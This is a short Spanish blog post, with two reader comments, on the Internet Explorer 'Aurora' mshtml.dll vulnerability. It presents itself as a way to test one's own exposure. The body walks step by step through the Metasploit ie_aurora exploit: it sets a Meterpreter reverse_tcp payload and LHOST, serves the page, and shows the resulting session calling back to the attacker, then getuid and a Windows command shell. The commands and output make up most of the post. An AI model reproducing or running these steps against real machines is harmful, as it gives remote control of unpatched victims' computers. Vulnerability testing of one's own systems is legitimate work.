Al fin se ha publicado la vulnerabilidad, que afecta a mshtml.dll en Internet Explorer 6 y posiblemente 7 y 8 que no usen DEP. En Metasploit ya han sacado un exploit para poder testear si somos vulnerables. Para probarlo, según pone en el blog de Metasploit, hacemos un msfupdate y luego abrimos msfconsole:
msf > use exploit/windows/browser/ie_aurora msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(ie_aurora) > set LHOST (your IP) msf exploit(ie_aurora) > set URIPATH / msf exploit(ie_aurora) > exploit [*] Exploit running as background job. msf exploit(ie_aurora) > |
Luego en la máquina vulnerable abrimos Internet Explorer y cargamos http://192.168.0.151:8080/ (cambiando 192.168.0.151 por la IP de la máquina que ejecuta metasploit)
Si todo va bien, obtendremos:
[*] Sending stage (723456 bytes) [*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514) msf exploit(ie_aurora) > sessions -i 1 meterpreter > getuid meterpreter > use espia meterpreter > shell C:\Documents and Settings\Developer\Desktop> |
Se puede obtener más información y ver un vídeo demostrativo en la página de pentester.es
kien mierda no tiene activado el DEP? en sp2 viene por defecto avtivado.. sino lo estubiera muchos exploit tmb serian validos.
Ya se saltan también el DEP (o eso dicen) pero no han liberado el exploit